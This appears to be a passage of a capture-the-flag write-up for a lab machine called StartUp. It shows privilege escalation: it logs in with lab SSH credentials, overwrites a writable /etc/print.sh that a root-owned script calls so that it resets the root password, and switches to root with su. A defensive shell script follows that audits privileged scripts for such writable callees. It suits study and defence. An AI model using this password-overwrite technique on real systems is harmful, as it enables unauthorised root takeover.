StartUp

Privilege Escalation

  • Log in over SSH with the credentials lennie:c4ntg3t3n0ughsp1c3
lennie@startup ~$ id
uid=1002(lennie) gid=1002(lennie) groups=1002(lennie)

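  • There is a script in lennie's home directory (scripts/planner.sh). The script is owned by root.
  • planner.sh calls /etc/print.sh, a script we have read-write access to, so its contents execute with the privileges of whoever runs planner.sh.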
lennie@startup ~$ ls -l scripts/
total 8
-rwxr-xr-x 1 root root 77 Nov 12 2020 planner.sh
-rw-r--r-- 1 root root 1 Oct 7 08:43 startup_list.txt
lennie@startup ~$ cat scripts/planner.sh
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh

  • Overwrite /etc/print.sh so that it changes the root password
lennie@startup ~$ echo 'echo -e "password\npassword" | passwd root' > /etc/print.sh 

  • We can now switch from lennie to root with su, using the password: password
lennie@startup ~$ su -
Password:
root@startup:~$ id
uid=0(root) gid=0(root) groups=0(root)
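
From the defender's side, the flaw above is a root-owned script that calls a file a low-privileged user can modify. The following is an added example, not part of the original write-up: a POSIX shell audit that generalizes the check to any script by listing the absolute paths it invokes and flagging those that someone other than the trusted owner can change. The function names `writable_by_others` and `audit_script`, and the heuristic of only matching commands at the start of a line, are assumptions of this example.

```shell
#!/bin/sh
# Added example: audit a privileged script for commands that others can modify.

# writable_by_others PATH [TRUSTED_UID]
# Exit 0 when PATH is owned by a UID other than TRUSTED_UID (default 0 = root)
# or has group/other write bits set. Exit 1 when it is safe or does not exist.
writable_by_others() {
    f=$1
    trusted=${2:-0}
    # -n: numeric UID, -d: do not list directory contents, -L: follow symlinks
    info=$(ls -ldnL -- "$f" 2>/dev/null) || return 1
    read -r mode links uid rest <<EOF
$info
EOF
    [ "$uid" = "$trusted" ] || return 0
    case $mode in
        ?????w*|????????w*) return 0 ;;   # group-write or other-write bit
    esac
    return 1
}

# audit_script SCRIPT [TRUSTED_UID]
# Heuristic: treat every line that starts with an absolute path as a command
# the script executes (the "#!" line and redirect targets are not matched).
audit_script() {
    script=$1
    owner=${2:-0}
    sed -n 's#^[[:space:]]*\(/[^[:space:];|&]*\).*#\1#p' "$script" | sort -u |
    while IFS= read -r target; do
        if writable_by_others "$target" "$owner"; then
            echo "WRITABLE: $target"
        elif writable_by_others "$(dirname -- "$target")" "$owner"; then
            # The file itself is fine, but it can be replaced via its directory
            echo "WRITABLE-DIR: $target"
        fi
    done
}

# Stand-alone use: sh audit.sh /path/to/script [trusted_uid]
if [ $# -gt 0 ]; then
    audit_script "$@"
fi
```

Any finding means the called file should be owned by root with mode 755 or stricter, in a directory only root can write to.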